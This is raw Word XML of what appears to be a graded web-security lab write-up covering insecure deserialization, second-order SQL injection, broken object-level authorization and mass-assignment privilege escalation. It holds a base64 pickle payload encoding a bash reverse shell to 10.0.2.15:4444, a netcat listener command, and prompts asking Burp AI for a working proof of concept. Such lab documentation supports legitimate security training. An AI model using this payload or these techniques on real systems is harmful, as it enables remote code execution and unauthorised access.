            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00582106">
              <w:rPr>
                <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>(</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00582106">
              <w:rPr>
                <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>MaliciousPayload</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00582106">
              <w:rPr>
                <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>())</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="58EBA70D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637483C6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># Base64 encode it</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="07F02BE8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582106">
              <w:rPr>
                <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>payload = base64.b64encode(serialized</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00582106">
              <w:rPr>
                <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>).decode</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00582106">
              <w:rPr>
                <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>()</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="23D1291E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2A232277" w14:textId="77777777" w:rsidR="00582106" w:rsidRPr="00582106" w:rsidRDefault="00582106" w:rsidP="00BB77B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proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00582106">
              <w:rPr>
                <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>print(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00582106">
              <w:rPr>
                <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>"\n=== MALICIOUS COOKIE PAYLOAD ===\n")</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="20EDFC69" w14:textId="77777777" w:rsidR="00582106" w:rsidRDefault="00582106" w:rsidP="00BB77BB">
            <w:pPr>
              <w:ind w:left="360"/>
            </w:pPr>
            <w:r w:rsidRPr="00582106">
              <w:rPr>
                <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>print(payload)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3F5E0E7C" w14:textId="77777777" w:rsidR="00582106" w:rsidRDefault="00582106" w:rsidP="00582106"/>
    <w:p w14:paraId="760ABEAF" w14:textId="3DDD65BD" w:rsidR="000E1A3E" w:rsidRDefault="00582106" w:rsidP="000E1A3E">
      <w:r w:rsidRPr="00582106">
        <w:t>gASVTAAAAAAAAACMBXBvc2l4lIwGc3lzdGVtlJOUjDFiYXNoIC1jICdiYXNoIC1pID4mIC9kZXYvdGNwLzEwLjAuMi4xNS80NDQ0IDA+JjEnlIWUUpQu</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7194C7D8" w14:textId="4758C5A5" w:rsidR="00582106" w:rsidRDefault="00582106" w:rsidP="000E1A3E">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="76D513DB" wp14:editId="47D4BCB8">
            <wp:extent cx="5943600" cy="575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5BEB" w14:textId="77777777" w:rsidR="00582106" w:rsidRDefault="00582106" w:rsidP="000E1A3E">
      <w:pPr>
        <w:rPr>
          <w:color w:val="00B0F0"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Have a </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>netcat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> listener:</w:t>
      </w:r>
      <w:r w:rsidRPr="00582106">
        <w:rPr>
          <w:color w:val="00B0F0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33A33856" w14:textId="71A50A63" w:rsidR="00582106" w:rsidRDefault="00582106" w:rsidP="000E1A3E">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00582106">
        <w:rPr>
          <w:color w:val="00B0F0"/>
        </w:rPr>
        <w:t>nc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00582106">
        <w:rPr>
          <w:color w:val="00B0F0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>lvnp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> 4444</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="129A18BF" w14:textId="19C833DD" w:rsidR="00582106" w:rsidRDefault="00582106" w:rsidP="000E1A3E">
      <w:r w:rsidRPr="00582106">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7FD11978" wp14:editId="34D99224">
            <wp:extent cx="5943600" cy="21291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7563" w14:textId="66FBD193" w:rsidR="00582106" w:rsidRPr="00582106" w:rsidRDefault="00582106" w:rsidP="00582106">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00582106">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Confirm</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>ed</w:t>
      </w:r>
      <w:r w:rsidRPr="00582106">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> the reverse shell connection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35D14899" w14:textId="38DAE0F6" w:rsidR="00582106" w:rsidRDefault="00582106" w:rsidP="000E1A3E"/>
    <w:p w14:paraId="3FF50CDE" w14:textId="77777777" w:rsidR="00582106" w:rsidRDefault="00582106" w:rsidP="000E1A3E"/>
    <w:p w14:paraId="3E699ED8" w14:textId="701E9894" w:rsidR="000E1A3E" w:rsidRPr="006850F6" w:rsidRDefault="006850F6" w:rsidP="000E1A3E">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006850F6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Burp AI: Automated scan</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> result</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05A0C098" w14:textId="5A512C31" w:rsidR="006850F6" w:rsidRPr="006850F6" w:rsidRDefault="006850F6" w:rsidP="000E1A3E">
      <w:pPr>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006850F6">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Can you find any vulnerability within this request?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36CFD801" w14:textId="5E9E7B33" w:rsidR="006850F6" w:rsidRDefault="006850F6" w:rsidP="000E1A3E"/>
    <w:p w14:paraId="00E92F65" w14:textId="586FDF2D" w:rsidR="006850F6" w:rsidRDefault="006850F6" w:rsidP="000E1A3E">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="56D1A227" wp14:editId="3D528E34">
            <wp:extent cx="5943600" cy="28168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4EAB" w14:textId="60D051F6" w:rsidR="000E1A3E" w:rsidRDefault="000E1A3E" w:rsidP="006850F6">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4A24E87C" w14:textId="5A1EAFD0" w:rsidR="006850F6" w:rsidRPr="006850F6" w:rsidRDefault="006850F6" w:rsidP="006850F6">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006850F6">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">Can you find any vulnerability from this </w:t>
      </w:r>
      <w:r w:rsidRPr="006850F6">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>request?</w:t>
      </w:r>
      <w:r w:rsidRPr="006850F6">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32E52F4C" w14:textId="54FC75DA" w:rsidR="006850F6" w:rsidRPr="006850F6" w:rsidRDefault="006850F6" w:rsidP="006850F6">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006850F6">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">Can you search for Java </w:t>
      </w:r>
      <w:r w:rsidRPr="006850F6">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>insecure</w:t>
      </w:r>
      <w:r w:rsidRPr="006850F6">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> deserialization in this </w:t>
      </w:r>
      <w:r w:rsidRPr="006850F6">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>request?</w:t>
      </w:r>
      <w:r w:rsidRPr="006850F6">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> can you generate a working </w:t>
      </w:r>
      <w:r w:rsidRPr="006850F6">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>POC?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D4CDE5B" w14:textId="24081E66" w:rsidR="006850F6" w:rsidRDefault="006850F6" w:rsidP="006850F6"/>
    <w:p w14:paraId="6682FCC1" w14:textId="62E13F79" w:rsidR="006850F6" w:rsidRDefault="006850F6" w:rsidP="006850F6">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="764CFCC4" wp14:editId="3A17B5B4">
            <wp:extent cx="5943600" cy="23545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6604" w14:textId="77777777" w:rsidR="006850F6" w:rsidRDefault="006850F6" w:rsidP="006850F6"/>
    <w:p w14:paraId="39787960" w14:textId="76FA8906" w:rsidR="006850F6" w:rsidRDefault="006850F6" w:rsidP="006850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240"/>
        <w:gridCol w:w="1440"/>
      </w:tblGrid>
      <w:tr w:rsidR="005A5E6A" w:rsidRPr="002F729C" w14:paraId="3301CA0F" w14:textId="77777777" w:rsidTr="00BB77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0C5BA" w14:textId="77777777" w:rsidR="005A5E6A" w:rsidRPr="002F729C" w:rsidRDefault="005A5E6A" w:rsidP="00BB77BB">
            <w:pPr>
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002F729C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lastRenderedPageBreak/>
              <w:t>V16 — Second-Order SQL Injection — Report Filter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E410A" w14:textId="77777777" w:rsidR="005A5E6A" w:rsidRPr="002F729C" w:rsidRDefault="005A5E6A" w:rsidP="00BB77BB">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002F729C">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="FF0000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>TIER 3 — HARD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21FFC" w14:textId="77777777" w:rsidR="005A5E6A" w:rsidRPr="002F729C" w:rsidRDefault="005A5E6A" w:rsidP="00BB77BB">
            <w:pPr>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002F729C">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>8 pts</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0467A850" w14:textId="66B16E2C" w:rsidR="005A5E6A" w:rsidRDefault="005A5E6A" w:rsidP="006850F6"/>
    <w:p w14:paraId="3FDC8E30" w14:textId="069F9288" w:rsidR="005A5E6A" w:rsidRDefault="005A5E6A" w:rsidP="006850F6">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Desene</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> animate, delete</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32C5307E" w14:textId="51E21762" w:rsidR="005A5E6A" w:rsidRDefault="005A5E6A" w:rsidP="006850F6"/>
    <w:p w14:paraId="69A7DA9F" w14:textId="677B05AA" w:rsidR="005A5E6A" w:rsidRDefault="005A5E6A" w:rsidP="006850F6"/>
    <w:p w14:paraId="759526EB" w14:textId="7602EF3E" w:rsidR="005A5E6A" w:rsidRDefault="005A5E6A" w:rsidP="006850F6"/>
    <w:p w14:paraId="69A110B0" w14:textId="630A10D1" w:rsidR="005A5E6A" w:rsidRDefault="005A5E6A" w:rsidP="006850F6"/>
    <w:p w14:paraId="14341CD0" w14:textId="2E4206D8" w:rsidR="005A5E6A" w:rsidRDefault="005A5E6A" w:rsidP="006850F6"/>
    <w:p w14:paraId="360D578C" w14:textId="38E46FD9" w:rsidR="005A5E6A" w:rsidRDefault="005A5E6A" w:rsidP="006850F6"/>
    <w:p w14:paraId="2EA3B771" w14:textId="59C13B32" w:rsidR="005A5E6A" w:rsidRDefault="005A5E6A" w:rsidP="006850F6"/>
    <w:p w14:paraId="6508E280" w14:textId="20E63393" w:rsidR="005A5E6A" w:rsidRDefault="005A5E6A" w:rsidP="006850F6"/>
    <w:p w14:paraId="3A555788" w14:textId="770BE108" w:rsidR="005A5E6A" w:rsidRDefault="005A5E6A" w:rsidP="006850F6"/>
    <w:p w14:paraId="1DC4EDF0" w14:textId="26E8D7BF" w:rsidR="005A5E6A" w:rsidRDefault="005A5E6A" w:rsidP="006850F6"/>
    <w:p w14:paraId="4DA97FC5" w14:textId="7A978A0B" w:rsidR="005A5E6A" w:rsidRDefault="005A5E6A" w:rsidP="006850F6"/>
    <w:p w14:paraId="2297D444" w14:textId="35B6E961" w:rsidR="005A5E6A" w:rsidRDefault="005A5E6A" w:rsidP="006850F6"/>
    <w:p w14:paraId="4523FC50" w14:textId="10936D3F" w:rsidR="005A5E6A" w:rsidRDefault="005A5E6A" w:rsidP="006850F6"/>
    <w:p w14:paraId="02D2B7BF" w14:textId="68DFD427" w:rsidR="005A5E6A" w:rsidRDefault="005A5E6A" w:rsidP="006850F6"/>
    <w:p w14:paraId="6DDADE18" w14:textId="00872E37" w:rsidR="005A5E6A" w:rsidRDefault="005A5E6A" w:rsidP="006850F6"/>
    <w:p w14:paraId="5D04B23F" w14:textId="1836F28F" w:rsidR="005A5E6A" w:rsidRDefault="005A5E6A" w:rsidP="006850F6"/>
    <w:p w14:paraId="0F040476" w14:textId="282BD24C" w:rsidR="005A5E6A" w:rsidRDefault="005A5E6A" w:rsidP="006850F6"/>
    <w:p w14:paraId="342F86A0" w14:textId="1E4C79E0" w:rsidR="005A5E6A" w:rsidRDefault="005A5E6A" w:rsidP="006850F6"/>
    <w:p w14:paraId="76EC405E" w14:textId="606E469D" w:rsidR="005A5E6A" w:rsidRDefault="005A5E6A" w:rsidP="006850F6"/>
    <w:p w14:paraId="0197E79B" w14:textId="3B9CCE5F" w:rsidR="005A5E6A" w:rsidRDefault="005A5E6A" w:rsidP="006850F6"/>
    <w:p w14:paraId="09A5DAAC" w14:textId="3AC2B45A" w:rsidR="005A5E6A" w:rsidRDefault="005A5E6A" w:rsidP="006850F6"/>
    <w:p w14:paraId="5A8DBF8E" w14:textId="77777777" w:rsidR="005A5E6A" w:rsidRDefault="005A5E6A" w:rsidP="006850F6"/>
    <w:p w14:paraId="749EB182" w14:textId="070CCD01" w:rsidR="00FA628B" w:rsidRDefault="00FA628B" w:rsidP="006850F6"/>
    <w:p w14:paraId="11214DBF" w14:textId="45B05C92" w:rsidR="00FA628B" w:rsidRDefault="00FA628B" w:rsidP="006850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240"/>
        <w:gridCol w:w="1440"/>
      </w:tblGrid>
      <w:tr w:rsidR="00FA628B" w14:paraId="06AAD7CE" w14:textId="77777777" w:rsidTr="00BB77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C785D" w14:textId="77777777" w:rsidR="00FA628B" w:rsidRDefault="00FA628B" w:rsidP="00BB77BB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V17 — API BOLA — Broken Object-Level Authorization on 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/v2/users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27E06" w14:textId="77777777" w:rsidR="00FA628B" w:rsidRDefault="00FA628B" w:rsidP="00BB77BB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TIER 3 — HARD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977EF" w14:textId="77777777" w:rsidR="00FA628B" w:rsidRDefault="00FA628B" w:rsidP="00BB77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6 pts</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="19DC321F" w14:textId="6325B45A" w:rsidR="00FA628B" w:rsidRDefault="00FA628B" w:rsidP="006850F6"/>
    <w:p w14:paraId="0445913A" w14:textId="77777777" w:rsidR="00FA628B" w:rsidRDefault="00FA628B" w:rsidP="00FA628B">
      <w:pPr>
        <w:spacing w:before="60" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="1C2833"/>
        </w:rPr>
        <w:t>The /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="1C2833"/>
        </w:rPr>
        <w:t>api</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="1C2833"/>
        </w:rPr>
        <w:t>/v2/users/&lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="1C2833"/>
        </w:rPr>
        <w:t>user_id</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="1C2833"/>
        </w:rPr>
        <w:t xml:space="preserve">&gt; GET handler fetches any user row by ID without verifying that the API key's owner matches the requested </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="1C2833"/>
        </w:rPr>
        <w:t>user_id</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="1C2833"/>
        </w:rPr>
        <w:t xml:space="preserve">. The API key is validated (it must exist in the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="1C2833"/>
        </w:rPr>
        <w:t>api_keys</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="1C2833"/>
        </w:rPr>
        <w:t xml:space="preserve"> table), but there is no check that row['</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="1C2833"/>
        </w:rPr>
        <w:t>user_id</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="1C2833"/>
        </w:rPr>
        <w:t xml:space="preserve">'] == </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="1C2833"/>
        </w:rPr>
        <w:t>user_id</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="1C2833"/>
        </w:rPr>
        <w:t>. Any valid API key grants read access to all user records.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EF73B63" w14:textId="7BE111B1" w:rsidR="00FA628B" w:rsidRDefault="00FA628B" w:rsidP="006850F6"/>
    <w:p w14:paraId="58D14752" w14:textId="468E8BE2" w:rsidR="00FA628B" w:rsidRDefault="00FA628B" w:rsidP="006850F6">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5AED645D" wp14:editId="3620461B">
            <wp:extent cx="5943600" cy="39477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B96" w14:textId="41194954" w:rsidR="00FA628B" w:rsidRDefault="00FA628B" w:rsidP="006850F6"/>
    <w:p w14:paraId="021F0252" w14:textId="7AA8BF5B" w:rsidR="00FA628B" w:rsidRDefault="00FA628B" w:rsidP="006850F6"/>
    <w:p w14:paraId="36C1EF69" w14:textId="51ABEBA1" w:rsidR="00FA628B" w:rsidRDefault="00FA628B" w:rsidP="006850F6"/>
    <w:p w14:paraId="4B7B7187" w14:textId="59BF336A" w:rsidR="00FA628B" w:rsidRDefault="00FA628B" w:rsidP="006850F6"/>
    <w:p w14:paraId="17244E84" w14:textId="66E4CBBB" w:rsidR="00FA628B" w:rsidRDefault="00FA628B" w:rsidP="006850F6"/>
    <w:p w14:paraId="7268C475" w14:textId="3845C28D" w:rsidR="00FA628B" w:rsidRDefault="00FA628B" w:rsidP="006850F6"/>
    <w:p w14:paraId="67457369" w14:textId="77777777" w:rsidR="00FA628B" w:rsidRDefault="00FA628B" w:rsidP="006850F6"/>
    <w:p w14:paraId="2F591DFF" w14:textId="08E08B65" w:rsidR="00FA628B" w:rsidRDefault="00FA628B" w:rsidP="006850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240"/>
        <w:gridCol w:w="1440"/>
      </w:tblGrid>
      <w:tr w:rsidR="00FA628B" w14:paraId="7A52AE83" w14:textId="77777777" w:rsidTr="00BB77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97B54" w14:textId="77777777" w:rsidR="00FA628B" w:rsidRDefault="00FA628B" w:rsidP="00BB77BB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V18 — API Mass Assignment — Privilege Escalation via PUT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D2CD7" w14:textId="77777777" w:rsidR="00FA628B" w:rsidRDefault="00FA628B" w:rsidP="00BB77BB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TIER 3 — HARD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E2088" w14:textId="77777777" w:rsidR="00FA628B" w:rsidRDefault="00FA628B" w:rsidP="00BB77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6 pts</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="25D2808A" w14:textId="4CC7FA19" w:rsidR="00FA628B" w:rsidRDefault="00FA628B" w:rsidP="006850F6"/>
    <w:p w14:paraId="4010EAAD" w14:textId="77777777" w:rsidR="00085602" w:rsidRDefault="00085602" w:rsidP="00085602">
      <w:pPr>
        <w:spacing w:before="60" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="1C2833"/>
        </w:rPr>
        <w:t>The attacker sends a PUT request with a JSON body containing role: 'admin'. The server constructs UPDATE users SET role=? WHERE id=? and executes it, elevating the user to admin. They can then log out and log back in to receive an admin session.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B366CE0" w14:textId="6407D2A6" w:rsidR="00FA628B" w:rsidRDefault="00FA628B" w:rsidP="006850F6"/>
    <w:p w14:paraId="1B292869" w14:textId="4DD1F79F" w:rsidR="00085602" w:rsidRDefault="00085602" w:rsidP="006850F6">
      <w:r>
        <w:t>Burp Request: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A628B" w14:paraId="3EA9574A" w14:textId="77777777" w:rsidTr="00BB77BB">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8990" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="0ED2BC16" w14:textId="77777777" w:rsidR="00FA628B" w:rsidRPr="00FA628B" w:rsidRDefault="00FA628B" w:rsidP="00FA628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FA628B">
              <w:rPr>
                <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>PUT /</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00FA628B">
              <w:rPr>
                <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>api</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00FA628B">
              <w:rPr>
                <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>/v2/users/</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00FA628B">
              <w:rPr>
                <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>2  HTTP</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00FA628B">
              <w:rPr>
                <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>/1.1</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="45863E48" w14:textId="77777777" w:rsidR="00FA628B" w:rsidRPr="00FA628B" w:rsidRDefault="00FA628B" w:rsidP="00FA628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FA628B">
              <w:rPr>
                <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Host: localhost:5000</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4A102307" w14:textId="77777777" w:rsidR="00FA628B" w:rsidRPr="00FA628B" w:rsidRDefault="00FA628B" w:rsidP="00FA628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FA628B">
              <w:rPr>
                <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Content-Length: 32</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="681C9955" w14:textId="77777777" w:rsidR="00FA628B" w:rsidRPr="00FA628B" w:rsidRDefault="00FA628B" w:rsidP="00FA628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FA628B">
              <w:rPr>
                <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Cache-Control: max-age=0</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2C335142" w14:textId="77777777" w:rsidR="00FA628B" w:rsidRPr="00FA628B" w:rsidRDefault="00FA628B" w:rsidP="00FA628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FA628B">
              <w:rPr>
                <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
